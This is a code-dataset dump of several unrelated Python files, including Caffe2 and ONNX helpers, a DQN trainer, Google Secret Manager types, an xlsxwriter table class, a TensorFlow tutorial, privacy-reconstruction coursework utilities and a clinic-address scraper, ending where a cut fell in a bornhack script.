metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "johncliu/Horizon",
"score": 2
} |
#### File: ml/rl/caffe_utils.py
```python
import itertools
import logging
import os
import traceback
from io import BytesIO
from typing import Any, Dict, List, Optional
import caffe2.python.onnx.backend
import numpy as np
import onnx
import torch
from caffe2.python import core, workspace
from caffe2.python.core import BlobReference
logger = logging.getLogger(__name__)
class C2Meta(type):
def __getattr__(cls, method_name):
def method(*inputs, **kwargs):
tb = traceback.extract_stack(limit=2)
blob_prefix = "{}:{}:{}".format(
os.path.basename(tb[0].filename), tb[0].lineno, method_name
)
OpSchema = workspace.C.OpSchema
schema = OpSchema.get(method_name)
num_outputs = schema.CalculateOutput(len(inputs))
outputs = []
if num_outputs < 0:
num_outputs = schema.max_output
for x in range(num_outputs):
outputs.append(C2._net.NextBlob(blob_prefix + "_output" + str(x)))
promoted_inputs = []
for i in inputs:
if type(i) != str and type(i) != BlobReference:
# Promote input by stuffing into a blob
input_name = C2._net.NextBlob(blob_prefix + "_input" + str(x))
if type(i) == np.ndarray:
workspace.FeedBlob(input_name, i)
else:
workspace.FeedBlob(input_name, np.array([i], dtype=np.float32))
promoted_inputs.append(input_name)
else:
promoted_inputs.append(i)
return C2._net.__getattr__(method_name)(promoted_inputs, outputs, **kwargs)
return method
class C2(metaclass=C2Meta):
_net: Optional[Any] = None
_init_net: Optional[Any] = None
_model: Optional[Any] = None
@staticmethod
def set_net(net):
C2._model = None
C2._net = net
C2._init_net = None
@staticmethod
def set_net_and_init_net(net, init_net):
C2._model = None
C2._net = net
C2._init_net = init_net
@staticmethod
def net():
return C2._net
@staticmethod
def init_net():
return C2._init_net
@staticmethod
def set_model(model):
C2._model = model
C2._init_net = None
if model is None:
C2._net = None
else:
C2._net = model.net
@staticmethod
def model():
return C2._model
@staticmethod
def NextBlob(prefix: str) -> str:
assert C2._net is not None
tb = traceback.extract_stack(limit=2)
prefix = "{}:{}:{}:{}".format(
C2._net.Name(), os.path.basename(tb[0].filename), tb[0].lineno, prefix
)
return C2._net.NextBlob(prefix)
class StackedArray(object):
def __init__(self, lengths, values):
self.lengths = lengths
self.values = values
@classmethod
def from_list_list(cls, d: List[List[float]], blob_prefix: str):
lengths_blob = blob_prefix + "_lengths"
values_blob = blob_prefix + "_values"
workspace.FeedBlob(lengths_blob, np.array([len(x) for x in d], dtype=np.int32))
workspace.FeedBlob(
values_blob, np.array(list(itertools.chain(*d)), dtype=np.float32)
)
return cls(lengths_blob, values_blob)
class StackedAssociativeArray(object):
def __init__(self, lengths, keys, values):
self.lengths = lengths
self.keys = keys
self.values = values
def to_python(self) -> List[Dict[Any, Any]]:
keys = workspace.FetchBlob(self.keys)
lengths = workspace.FetchBlob(self.lengths)
values = workspace.FetchBlob(self.values)
retval: List[Dict[Any, Any]] = []
cursor = 0
for length in lengths:
d = {}
for _ in range(length):
key = keys[cursor]
value = values[cursor]
d[key] = value
cursor += 1
retval.append(d)
return retval
@classmethod
def from_dict_list(cls, d: List[Dict[int, float]], blob_prefix: str):
lengths_blob = blob_prefix + "_lengths"
keys_blob = blob_prefix + "_keys"
values_blob = blob_prefix + "_values"
workspace.FeedBlob(lengths_blob, np.array([len(x) for x in d], dtype=np.int32))
key_list_2d = [list(x.keys()) for x in d]
workspace.FeedBlob(
keys_blob, np.array(list(itertools.chain(*key_list_2d)), dtype=np.int32)
)
value_list_2d = [list(x.values()) for x in d]
workspace.FeedBlob(
values_blob,
np.array(list(itertools.chain(*value_list_2d)), dtype=np.float32),
)
return cls(lengths_blob, keys_blob, values_blob)
class StackedTwoLevelAssociativeArray(object):
def __init__(
self,
outer_lengths: str,
outer_keys: str,
inner_lengths: str,
inner_keys: str,
inner_values: str,
) -> None:
self.outer_lengths = outer_lengths
self.outer_keys = outer_keys
self.inner_lengths = inner_lengths
self.inner_keys = inner_keys
self.inner_values = inner_values
def to_python(self) -> List[Dict[Any, Dict[Any, Any]]]:
outer_keys = workspace.FetchBlob(self.outer_keys)
outer_lengths = workspace.FetchBlob(self.outer_lengths)
inner_keys = workspace.FetchBlob(self.inner_keys)
inner_lengths = workspace.FetchBlob(self.inner_lengths)
inner_values = workspace.FetchBlob(self.inner_values)
retval: List[Dict[Any, Dict[Any, Any]]] = []
outer_cursor = 0
inner_cursor = 0
for length in outer_lengths:
outer_dict = {}
for _ in range(length):
outer_key = outer_keys[outer_cursor]
inner_length = inner_lengths[outer_cursor]
outer_cursor += 1
inner_dict = {}
for _ in range(inner_length):
inner_key = inner_keys[inner_cursor]
inner_value = inner_values[inner_cursor]
inner_cursor += 1
inner_dict[inner_key] = inner_value
outer_dict[outer_key] = inner_dict
retval.append(outer_dict)
return retval
class PytorchCaffe2Converter(object):
@staticmethod
def pytorch_net_to_caffe2_netdef(*args, **kwargs):
buffer = PytorchCaffe2Converter.pytorch_net_to_buffer(*args, **kwargs)
return PytorchCaffe2Converter.buffer_to_caffe2_netdef(buffer)
@staticmethod
def pytorch_net_to_buffer(pytorch_net, input_dim, model_on_gpu, float_input=True):
"""Traces a pytorch net and outputs a python buffer object
holding net."""
training = pytorch_net.training
pytorch_net.train(False)
for name, p in pytorch_net.named_parameters():
inf_count = torch.isinf(p).sum().item()
nan_count = torch.isnan(p).sum().item()
assert inf_count + nan_count == 0, "{} has {} inf and {} nan".format(
name, inf_count, nan_count
)
if float_input:
dtype = torch.cuda.FloatTensor if model_on_gpu else torch.FloatTensor
dummy_input = torch.randn(1, input_dim).type(dtype)
else:
dtype = torch.cuda.LongTensor if model_on_gpu else torch.LongTensor
dummy_input = torch.randint(low=0, high=1, size=(1, input_dim)).type(dtype)
write_buffer = BytesIO()
try:
torch.onnx.export(pytorch_net, dummy_input, write_buffer)
finally:
pytorch_net.train(training)
return write_buffer
@staticmethod
def buffer_to_caffe2_netdef(buffer):
"""Creates caffe2 NetDef from buffer object and returns pointer to
input and output blobs and the NetDef."""
protobuf_model = onnx.load(BytesIO(buffer.getvalue()))
input_blob_name = protobuf_model.graph.input[0].name
output_blob_name = protobuf_model.graph.output[0].name
logger.info(
"INPUT BLOB: " + input_blob_name + ". OUTPUT BLOB:" + output_blob_name
)
return (
input_blob_name,
output_blob_name,
caffe2.python.onnx.backend.prepare(protobuf_model),
)
@staticmethod
def remap_blobs(input_blob, output_blob, netdef, prefix):
init_net = core.Net(netdef.init_net)
predict_net = core.Net(netdef.predict_net)
blob_remap = {
str(b): "{}/{}".format(prefix, str(b))
for n in [init_net, predict_net]
for b in n.external_inputs + n.external_outputs
}
remapped_input_blob = blob_remap[input_blob]
remapped_output_blob = blob_remap[output_blob]
remapped_init_net, _blob_remap = core.clone_and_bind_net(
init_net, "{}_init".format(prefix), "{}_init/".format(prefix), blob_remap
)
remapped_predict_net, predict_blob_remap = core.clone_and_bind_net(
predict_net,
"{}_predict".format(prefix),
"{}_predict/".format(prefix),
blob_remap,
)
torch_workspace = netdef.workspace
parameters = torch_workspace.Blobs()
for blob_str in parameters:
workspace.FeedBlob(
blob_remap[blob_str], torch_workspace.FetchBlob(blob_str)
)
remapped_parameters = [predict_blob_remap[b] for b in parameters]
return (
remapped_input_blob,
remapped_output_blob,
remapped_parameters,
remapped_init_net,
remapped_predict_net,
)
```
#### File: rl/training/dqn_trainer_base.py
```python
import logging
import torch
from ml.rl.training.rl_trainer_pytorch import RLTrainer
logger = logging.getLogger(__name__)
class DQNTrainerBase(RLTrainer):
def get_max_q_values(self, q_values, q_values_target, possible_actions_mask):
"""
Used in Q-learning update.
:param states: Numpy array with shape (batch_size, state_dim). Each row
contains a representation of a state.
:param possible_actions_mask: Numpy array with shape (batch_size, action_dim).
possible_actions[i][j] = 1 iff the agent can take action j from
state i.
:param double_q_learning: bool to use double q-learning
"""
# The parametric DQN can create flattened q values so we reshape here.
q_values = q_values.reshape(possible_actions_mask.shape)
q_values_target = q_values_target.reshape(possible_actions_mask.shape)
if self.double_q_learning:
# Set q-values of impossible actions to a very large negative number.
inverse_pna = 1 - possible_actions_mask
impossible_action_penalty = self.ACTION_NOT_POSSIBLE_VAL * inverse_pna
q_values = q_values + impossible_action_penalty
# Select max_q action after scoring with online network
max_q_values, max_indicies = torch.max(q_values, dim=1, keepdim=True)
# Use q_values from target network for max_q action from online q_network
# to decouble selection & scoring, preventing overestimation of q-values
q_values = torch.gather(q_values_target, 1, max_indicies)
return q_values, max_indicies
else:
# Set q-values of impossible actions to a very large negative number.
inverse_pna = 1 - possible_actions_mask
impossible_action_penalty = self.ACTION_NOT_POSSIBLE_VAL * inverse_pna
q_values = q_values + impossible_action_penalty
max_q_values, max_indicies = torch.max(q_values, dim=1, keepdim=True)
return max_q_values, max_indicies
``` |
{
"source": "johnclyde/python-secret-manager",
"score": 2
} |
#### File: secretmanager_v1beta1/types/service.py
```python
import proto # type: ignore
from google.cloud.secretmanager_v1beta1.types import resources
from google.protobuf import field_mask_pb2 as field_mask # type: ignore
__protobuf__ = proto.module(
package="google.cloud.secrets.v1beta1",
manifest={
"ListSecretsRequest",
"ListSecretsResponse",
"CreateSecretRequest",
"AddSecretVersionRequest",
"GetSecretRequest",
"ListSecretVersionsRequest",
"ListSecretVersionsResponse",
"GetSecretVersionRequest",
"UpdateSecretRequest",
"AccessSecretVersionRequest",
"AccessSecretVersionResponse",
"DeleteSecretRequest",
"DisableSecretVersionRequest",
"EnableSecretVersionRequest",
"DestroySecretVersionRequest",
},
)
class ListSecretsRequest(proto.Message):
r"""Request message for
[SecretManagerService.ListSecrets][google.cloud.secrets.v1beta1.SecretManagerService.ListSecrets].
Attributes:
parent (str):
Required. The resource name of the project associated with
the [Secrets][google.cloud.secrets.v1beta1.Secret], in the
format ``projects/*``.
page_size (int):
Optional. The maximum number of results to be
returned in a single page. If set to 0, the
server decides the number of results to return.
If the number is greater than 25000, it is
capped at 25000.
page_token (str):
Optional. Pagination token, returned earlier via
[ListSecretsResponse.next_page_token][google.cloud.secrets.v1beta1.ListSecretsResponse.next_page_token].
"""
parent = proto.Field(proto.STRING, number=1)
page_size = proto.Field(proto.INT32, number=2)
page_token = proto.Field(proto.STRING, number=3)
class ListSecretsResponse(proto.Message):
r"""Response message for
[SecretManagerService.ListSecrets][google.cloud.secrets.v1beta1.SecretManagerService.ListSecrets].
Attributes:
secrets (Sequence[google.cloud.secretmanager_v1beta1.types.Secret]):
The list of [Secrets][google.cloud.secrets.v1beta1.Secret]
sorted in reverse by create_time (newest first).
next_page_token (str):
A token to retrieve the next page of results. Pass this
value in
[ListSecretsRequest.page_token][google.cloud.secrets.v1beta1.ListSecretsRequest.page_token]
to retrieve the next page.
total_size (int):
The total number of
[Secrets][google.cloud.secrets.v1beta1.Secret].
"""
@property
def raw_page(self):
return self
secrets = proto.RepeatedField(proto.MESSAGE, number=1, message=resources.Secret,)
next_page_token = proto.Field(proto.STRING, number=2)
total_size = proto.Field(proto.INT32, number=3)
class CreateSecretRequest(proto.Message):
r"""Request message for
[SecretManagerService.CreateSecret][google.cloud.secrets.v1beta1.SecretManagerService.CreateSecret].
Attributes:
parent (str):
Required. The resource name of the project to associate with
the [Secret][google.cloud.secrets.v1beta1.Secret], in the
format ``projects/*``.
secret_id (str):
Required. This must be unique within the project.
A secret ID is a string with a maximum length of 255
characters and can contain uppercase and lowercase letters,
numerals, and the hyphen (``-``) and underscore (``_``)
characters.
secret (google.cloud.secretmanager_v1beta1.types.Secret):
Required. A [Secret][google.cloud.secrets.v1beta1.Secret]
with initial field values.
"""
parent = proto.Field(proto.STRING, number=1)
secret_id = proto.Field(proto.STRING, number=2)
secret = proto.Field(proto.MESSAGE, number=3, message=resources.Secret,)
class AddSecretVersionRequest(proto.Message):
r"""Request message for
[SecretManagerService.AddSecretVersion][google.cloud.secrets.v1beta1.SecretManagerService.AddSecretVersion].
Attributes:
parent (str):
Required. The resource name of the
[Secret][google.cloud.secrets.v1beta1.Secret] to associate
with the
[SecretVersion][google.cloud.secrets.v1beta1.SecretVersion]
in the format ``projects/*/secrets/*``.
payload (google.cloud.secretmanager_v1beta1.types.SecretPayload):
Required. The secret payload of the
[SecretVersion][google.cloud.secrets.v1beta1.SecretVersion].
"""
parent = proto.Field(proto.STRING, number=1)
payload = proto.Field(proto.MESSAGE, number=2, message=resources.SecretPayload,)
class GetSecretRequest(proto.Message):
r"""Request message for
[SecretManagerService.GetSecret][google.cloud.secrets.v1beta1.SecretManagerService.GetSecret].
Attributes:
name (str):
Required. The resource name of the
[Secret][google.cloud.secrets.v1beta1.Secret], in the format
``projects/*/secrets/*``.
"""
name = proto.Field(proto.STRING, number=1)
class ListSecretVersionsRequest(proto.Message):
r"""Request message for
[SecretManagerService.ListSecretVersions][google.cloud.secrets.v1beta1.SecretManagerService.ListSecretVersions].
Attributes:
parent (str):
Required. The resource name of the
[Secret][google.cloud.secrets.v1beta1.Secret] associated
with the
[SecretVersions][google.cloud.secrets.v1beta1.SecretVersion]
to list, in the format ``projects/*/secrets/*``.
page_size (int):
Optional. The maximum number of results to be
returned in a single page. If set to 0, the
server decides the number of results to return.
If the number is greater than 25000, it is
capped at 25000.
page_token (str):
Optional. Pagination token, returned earlier via
ListSecretVersionsResponse.next_page_token][].
"""
parent = proto.Field(proto.STRING, number=1)
page_size = proto.Field(proto.INT32, number=2)
page_token = proto.Field(proto.STRING, number=3)
class ListSecretVersionsResponse(proto.Message):
r"""Response message for
[SecretManagerService.ListSecretVersions][google.cloud.secrets.v1beta1.SecretManagerService.ListSecretVersions].
Attributes:
versions (Sequence[google.cloud.secretmanager_v1beta1.types.SecretVersion]):
The list of
[SecretVersions][google.cloud.secrets.v1beta1.SecretVersion]
sorted in reverse by create_time (newest first).
next_page_token (str):
A token to retrieve the next page of results. Pass this
value in
[ListSecretVersionsRequest.page_token][google.cloud.secrets.v1beta1.ListSecretVersionsRequest.page_token]
to retrieve the next page.
total_size (int):
The total number of
[SecretVersions][google.cloud.secrets.v1beta1.SecretVersion].
"""
@property
def raw_page(self):
return self
versions = proto.RepeatedField(
proto.MESSAGE, number=1, message=resources.SecretVersion,
)
next_page_token = proto.Field(proto.STRING, number=2)
total_size = proto.Field(proto.INT32, number=3)
class GetSecretVersionRequest(proto.Message):
r"""Request message for
[SecretManagerService.GetSecretVersion][google.cloud.secrets.v1beta1.SecretManagerService.GetSecretVersion].
Attributes:
name (str):
Required. The resource name of the
[SecretVersion][google.cloud.secrets.v1beta1.SecretVersion]
in the format ``projects/*/secrets/*/versions/*``.
``projects/*/secrets/*/versions/latest`` is an alias to the
``latest``
[SecretVersion][google.cloud.secrets.v1beta1.SecretVersion].
"""
name = proto.Field(proto.STRING, number=1)
class UpdateSecretRequest(proto.Message):
r"""Request message for
[SecretManagerService.UpdateSecret][google.cloud.secrets.v1beta1.SecretManagerService.UpdateSecret].
Attributes:
secret (google.cloud.secretmanager_v1beta1.types.Secret):
Required. [Secret][google.cloud.secrets.v1beta1.Secret] with
updated field values.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. Specifies the fields to be updated.
"""
secret = proto.Field(proto.MESSAGE, number=1, message=resources.Secret,)
update_mask = proto.Field(proto.MESSAGE, number=2, message=field_mask.FieldMask,)
class AccessSecretVersionRequest(proto.Message):
r"""Request message for
[SecretManagerService.AccessSecretVersion][google.cloud.secrets.v1beta1.SecretManagerService.AccessSecretVersion].
Attributes:
name (str):
Required. The resource name of the
[SecretVersion][google.cloud.secrets.v1beta1.SecretVersion]
in the format ``projects/*/secrets/*/versions/*``.
"""
name = proto.Field(proto.STRING, number=1)
class AccessSecretVersionResponse(proto.Message):
r"""Response message for
[SecretManagerService.AccessSecretVersion][google.cloud.secrets.v1beta1.SecretManagerService.AccessSecretVersion].
Attributes:
name (str):
The resource name of the
[SecretVersion][google.cloud.secrets.v1beta1.SecretVersion]
in the format ``projects/*/secrets/*/versions/*``.
payload (google.cloud.secretmanager_v1beta1.types.SecretPayload):
Secret payload
"""
name = proto.Field(proto.STRING, number=1)
payload = proto.Field(proto.MESSAGE, number=2, message=resources.SecretPayload,)
class DeleteSecretRequest(proto.Message):
r"""Request message for
[SecretManagerService.DeleteSecret][google.cloud.secrets.v1beta1.SecretManagerService.DeleteSecret].
Attributes:
name (str):
Required. The resource name of the
[Secret][google.cloud.secrets.v1beta1.Secret] to delete in
the format ``projects/*/secrets/*``.
"""
name = proto.Field(proto.STRING, number=1)
class DisableSecretVersionRequest(proto.Message):
r"""Request message for
[SecretManagerService.DisableSecretVersion][google.cloud.secrets.v1beta1.SecretManagerService.DisableSecretVersion].
Attributes:
name (str):
Required. The resource name of the
[SecretVersion][google.cloud.secrets.v1beta1.SecretVersion]
to disable in the format
``projects/*/secrets/*/versions/*``.
"""
name = proto.Field(proto.STRING, number=1)
class EnableSecretVersionRequest(proto.Message):
r"""Request message for
[SecretManagerService.EnableSecretVersion][google.cloud.secrets.v1beta1.SecretManagerService.EnableSecretVersion].
Attributes:
name (str):
Required. The resource name of the
[SecretVersion][google.cloud.secrets.v1beta1.SecretVersion]
to enable in the format ``projects/*/secrets/*/versions/*``.
"""
name = proto.Field(proto.STRING, number=1)
class DestroySecretVersionRequest(proto.Message):
r"""Request message for
[SecretManagerService.DestroySecretVersion][google.cloud.secrets.v1beta1.SecretManagerService.DestroySecretVersion].
Attributes:
name (str):
Required. The resource name of the
[SecretVersion][google.cloud.secrets.v1beta1.SecretVersion]
to destroy in the format
``projects/*/secrets/*/versions/*``.
"""
name = proto.Field(proto.STRING, number=1)
__all__ = tuple(sorted(__protobuf__.manifest))
```
#### File: samples/snippets/iam_grant_access.py
```python
import argparse
# [START secretmanager_iam_grant_access]
def iam_grant_access(project_id, secret_id, member):
"""
Grant the given member access to a secret.
"""
# Import the Secret Manager client library.
from google.cloud import secretmanager
# Create the Secret Manager client.
client = secretmanager.SecretManagerServiceClient()
# Build the resource name of the secret.
name = client.secret_path(project_id, secret_id)
# Get the current IAM policy.
policy = client.get_iam_policy(request={"resource": name})
# Add the given member with access permissions.
policy.bindings.add(role="roles/secretmanager.secretAccessor", members=[member])
# Update the IAM Policy.
new_policy = client.set_iam_policy(request={"resource": name, "policy": policy})
# Print data about the secret.
print("Updated IAM policy on {}".format(secret_id))
# [END secretmanager_iam_grant_access]
return new_policy
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument("project_id", help="id of the GCP project")
parser.add_argument("secret_id", help="id of the secret to get")
parser.add_argument("member", help="member to grant access")
args = parser.parse_args()
iam_grant_access(args.project_id, args.secret_id, args.member)
``` |
{
"source": "johnclyde/rubik",
"score": 3
} |
#### File: rubik/calendar/dumb_renderer.py
```python
class DumbRenderer(object):
names_of_days = [
"Monday",
"Tuesday",
"Wednesday",
"Thursday",
"Friday",
"Saturday",
"Sunday",
]
def render_week(self, week):
print()
print('time for another week')
for d in week:
dow = d.weekday()
dow_name = self.names_of_days[dow]
print("date is {date}".format(date=d))
print("Day of week is {dow}.".format(dow=dow_name))
``` |
{
"source": "johncmacy/xlsxwriter-tables",
"score": 3
} |
#### File: xlsxwriter-tables/xlsxwriter_tables/xlsxwriter_tables.py
```python
from typing import Union
class ExcelTable:
def _get_column(self, column_name:str, column_props:Union[dict, str]) -> dict:
'''
Defaults to the title-cased `column_name`:
my_favorite_color: 'My Favorite Color'
For acronyms, abbreviations, provide the correct capitalization in the `column_name`:
NFL_franchise_name: 'NFL Franchise Name'
'''
column = {'header': column_name.replace('_', ' ').title()}
'''
If other attributes were provided, such as `formula`, or `format`, pass them along.
'''
if isinstance(column_props, dict):
column.update(**column_props)
return column
def _get_data(self, item, column_name:str, column_props:Union[None, dict, str, tuple], separator, raise_attribute_errors):
'''
Set the default value to `column_name`:
columns = {
'date_is_tuesday': ...
}
'''
data_accessor = column_name
'''
For each column key, its value `column_props` could be None, or a string, tuple, function, or dictionary:
columns = {
'column_with_none': None,
'column_with_string': 'deeply.nested.property',
'column_with_tuple': ('deeply', 'nested', 'property'),
'column_with_function': lambda item: ...,
'column_with_dict': {
'data_accessor': ...,
},
}
If `column_props` is a dictionary, it may have a `data_accessor` key.
If it does, `data_accessor` could be a string, tuple, or function.
If not, continue to use the `column_name` as the `data_accessor`.
'''
if column_props:
'''
If `column_props` is a dict, look for a `data_accessor` property.
columns = {
'date_is_tuesday': {
'data_accessor': ...
}
}
`data_accessor` could be a function, str, or tuple.
'''
if isinstance(column_props, dict):
if 'data_accessor' in column_props.keys():
data_accessor = column_props['data_accessor']
else:
'''
If `column_props` is a dict, but it doesn't have a
`data_accessor` key, then use the `column_name` as
a string as the `data_accessor`.
'''
pass
else:
'''
If not a dict, it's either a string, tuple, or function.
'''
data_accessor = column_props
'''
If `data_accessor` is a function, call the function and
return the resulting value.
Note: The function should expect a single kwarg, `item`.
Example:
def day_of_week_is_tuesday(item):
return item.start_date.weekday() == 1
columns = {
'date_is_tuesday': {
'data_accessor': day_of_week_is_tuesday,
}
}
Or, as an inline (lambda) function:
columns = {
'date_is_tuesday': {
'data_accessor': lambda item: item.start_date.weekday() == 1
}
}
'''
if callable(data_accessor):
return data_accessor(item)
'''
If we've made it this far, it's either a tuple or a string.
If it's a string, split it using the separator, and convert to a tuple.
For the following examples, assume each item has a data structure like so:
{
'alpha': {
'bravo': {
'charlie': 123,
}
}
}
The default attribute separator is dot ('.'):
alpha.bravo.charlie'
Custom separators can be used. For instance, to resemble Django's ORM, set the separator to '__':
'alpha__bravo__charlie'
'''
if isinstance(data_accessor, str):
data_accessor = tuple(data_accessor.split(separator))
'''
By now, we should have a tuple, which is a list
of nested attributes that point to where the data is.
This code recursively traverses through the tuple of
nested attributes and returns the value that is deeply
nested inside the data structure.
'''
if isinstance(data_accessor, tuple):
# need to deepcopy here?
nested_data = item
for key in data_accessor:
try:
if isinstance(nested_data, dict):
nested_data = nested_data[key]
else:
nested_data = getattr(nested_data, key)
if callable(nested_data):
nested_data = nested_data()
except (KeyError, AttributeError) as e:
if raise_attribute_errors:
return f'{type(e)}: {str(e)}'
else:
return None
except Exception as e:
'''
If an exception other than (KeyError, AttributeError) is encountered, the error message
is returned and displayed in the cell to aid in troubleshooting.
'''
return f'{type(e)}: {str(e)}'
return nested_data
'''
If we reach this point, we don't know how to access data from the item, so raise an error.
'''
raise ValueError(f'''
Unable to detect the `data_accessor`. Please provide a function, string, or tuple.
- column_name={column_name}
- column_props={column_props}
''')
def __init__(self, columns:dict, data:list, separator='.', include_total_row=True, raise_attribute_errors=False):
columns_dict = {
name: self._get_column(name, props)
for name, props
in columns.items()
}
columns_and_headers = {
key: f'[@[{value["header"]}]]'
for key, value
in columns_dict.items()
}
for column in columns_dict.values():
if 'formula' in column.keys():
formula_str:str = column['formula']
column['formula'] = formula_str.format(**columns_and_headers)
self.columns:list[dict] = tuple(columns_dict.values())
self.data:list = [
[
self._get_data(item, column_name, column_props, separator, raise_attribute_errors)
for column_name, column_props
in columns.items()
]
for item
in data
]
self.top_left = (0,0)
self.bottom_right = (
len(self.data) - 1 + 1 + (1 if include_total_row else 0),
len(self.columns) - 1
)
self.coordinates = (*self.top_left, *self.bottom_right)
self.include_total_row = include_total_row
``` |
{
"source": "johncmerfeld/BUCS_dataPrivacy",
"score": 3
} |
#### File: johncmerfeld/BUCS_dataPrivacy/attackUtils.py
```python
import numpy as np
import random as rand
# given a length n,
# return a random binary vector
def secretVector(n):
x = np.zeros(n, dtype = int)
for i in range(0, len(x) - 1):
r = rand.uniform(0, 1)
if r < 0.5:
x[i] = 0
else:
x[i] = 1
return x
# given a matrix A, a vector x, and a variance s
# return a vector Ax + e, where e is a random error term from N(0, s^2)
def privacyMechanism(A, x, sigma):
n = len(x)
# set up noise vector
e = np.zeros(len(A), dtype = float)
for i in range(0, len(e)):
e[i] = np.random.normal(0, sigma ** 2)
return ((1/n) * A.dot(x)) + e
def normalizedHammingDistance(v1, v2):
# sanity check
assert len(v1) == len(v2)
# initialize output
distance = 0
for i in range(0, len(v1)):
if v1[i] != v2[i]:
distance += 1
return (len(v1) - distance) / len(v1)
```
#### File: johncmerfeld/BUCS_dataPrivacy/tensorflowPractice.py
```python
import tensorflow as tf
from tensorflow import keras
# Helper libraries
import numpy as np
import cv2
import matplotlib.pyplot as plt
# possible warning suppressing stuff
#print(tf.__version__)
#import os
#os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
# define dataset
fashion_mnist = keras.datasets.fashion_mnist
(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()
class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',
'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
# example 1
plt.figure()
plt.imshow(train_images[100])
plt.colorbar()
plt.grid(False)
# put scores in [0,1]
train_images = train_images / 255.0
test_images = test_images / 255.0
# example 2
plt.figure(figsize=(10,10))
for i in range(25):
plt.subplot(5,5,i+1)
plt.xticks([])
plt.yticks([])
plt.grid(False)
plt.imshow(train_images[i], cmap=plt.cm.binary)
plt.xlabel(class_names[train_labels[i]])
# set up layers
model = keras.Sequential([
keras.layers.Flatten(input_shape=(28, 28)),
keras.layers.Dense(128, activation=tf.nn.relu),
keras.layers.Dense(10, activation=tf.nn.softmax)
])
model.compile(optimizer=tf.train.AdamOptimizer(),
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
model.fit(train_images, train_labels, epochs = 3)
test_loss, test_acc = model.evaluate(test_images, test_labels)
print('Test accuracy:', test_acc)
predictions = model.predict(test_images)
def plot_image(i, predictions_array, true_label, img):
predictions_array, true_label, img = predictions_array[i], true_label[i], img[i]
plt.grid(False)
plt.xticks([])
plt.yticks([])
plt.imshow(img, cmap=plt.cm.binary)
predicted_label = np.argmax(predictions_array)
if predicted_label == true_label:
color = 'blue'
else:
color = 'red'
plt.xlabel("{} {:2.0f}% ({})".format(class_names[predicted_label],
100*np.max(predictions_array),
class_names[true_label]),
color=color)
def plot_value_array(i, predictions_array, true_label):
predictions_array, true_label = predictions_array[i], true_label[i]
plt.grid(False)
plt.xticks([])
plt.yticks([])
thisplot = plt.bar(range(10), predictions_array, color="#777777")
plt.ylim([0, 1])
predicted_label = np.argmax(predictions_array)
thisplot[predicted_label].set_color('red')
thisplot[true_label].set_color('blue')
num_rows = 5
num_cols = 3
num_images = num_rows*num_cols
plt.figure(figsize=(2*2*num_cols, 2*num_rows))
for i in range(num_images):
plt.subplot(num_rows, 2*num_cols, 2*i+1)
plot_image(i, predictions, test_labels, test_images)
plt.subplot(num_rows, 2*num_cols, 2*i+2)
plot_value_array(i, predictions, test_labels)
img = cv2.imread("img.jpg", 0)
img = img / 256
test_images[0] = img
predictions = model.predict(test_images)
def plot_image(i, predictions_array, true_label, img):
predictions_array, true_label, img = predictions_array[i], true_label[i], img[i]
plt.grid(False)
plt.xticks([])
plt.yticks([])
plt.imshow(img, cmap=plt.cm.binary)
predicted_label = np.argmax(predictions_array)
if predicted_label == true_label:
color = 'blue'
else:
color = 'red'
plt.xlabel("{} {:2.0f}% ({})".format(class_names[predicted_label],
100*np.max(predictions_array),
class_names[true_label]),
color=color)
def plot_value_array(i, predictions_array, true_label):
predictions_array, true_label = predictions_array[i], true_label[i]
plt.grid(False)
plt.xticks([])
plt.yticks([])
thisplot = plt.bar(range(10), predictions_array, color="#777777")
plt.ylim([0, 1])
predicted_label = np.argmax(predictions_array)
thisplot[predicted_label].set_color('red')
#thisplot[true_label].set_color('blue')
i = 1
plt.figure(figsize=(6,3))
plt.subplot(1,2,1)
plot_image(i, predictions, test_labels, test_images)
plt.subplot(1,2,2)
plot_value_array(i, predictions, test_labels)
img2 = cv2.imread("img2.jpg", 0)
img2 = img2 / 256
test_images[1] = img2
img3 = cv2.imread("img3.png", 0)
img3 = img3 / 256
test_images[2] = img3
i = 2
plt.figure(figsize=(6,3))
plt.subplot(1,2,1)
plot_image(i, predictions, test_labels, test_images)
plt.subplot(1,2,2)
plot_value_array(i, predictions, test_labels)
img4 = cv2.imread("img4.jpg", 0)
img4 = img4 / 256
test_images[3] = img4
i = 3
plt.figure(figsize=(6,3))
plt.subplot(1,2,1)
plot_image(i, predictions, test_labels, test_images)
plt.subplot(1,2,2)
plot_value_array(i, predictions, test_labels)
new_images = test_images[0:3]
img4 = cv2.imread("img6.jpg", 0)
img4 = img4 / 256
new_images[2] = img4
new_preds = model.predict(new_images)
``` |
{
"source": "johncmerfeld/PlannedParenthoodLocations",
"score": 3
} |
#### File: johncmerfeld/PlannedParenthoodLocations/pp_scraper.py
```python
import scrapy, json
# read from the list of URLS generated previously
def get_urls():
file = "health_centers.json"
urls = []
with open(file) as f:
links = json.load(f)
for i in range(len(links)):
link = links[i]["link"]
urls.append(link)
return urls
class PlannedParenthoodScraper(scrapy.Spider):
"""
This class first requests base urls, then from the base urls
we extract the next urls to call. We call all the possible urls
and download the content from each one of them.
"""
name = "pp_address_scrapper"
def start_requests(self):
urls = get_urls()
for url in urls:
yield scrapy.Request(url=url, callback=self.parse)
def parse(self, response):
for post in response.xpath('//p[@class="address-loc"]'):
address = post.xpath('//span[@itemprop="streetAddress"]/text()').get()
locality = post.xpath('//span[@itemprop="addressLocality"]/text()').get()
region = post.xpath('//span[@itemprop="addressRegion"]/text()').get()
postal = post.xpath('//span[@itemprop="postalCode"]/text()').get()
yield {"address" : address,
"locality": locality,
"region" : region,
"postal" : postal}
with open("addresses.json") as f:
data = json.load(f)
import csv
with open('health_centers.csv', 'w', newline='') as csvfile:
fieldnames = ["address", "locality", "region", "postal"]
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for row in data:
writer.writerow(row)
``` |
{
"source": "johncoffee/bornhack-website",
"score": 2
} |
#### File: management/commands/bootstrap-devsite.py
```python
import logging
import random
import sys
from datetime import datetime, timedelta
import factory
import pytz
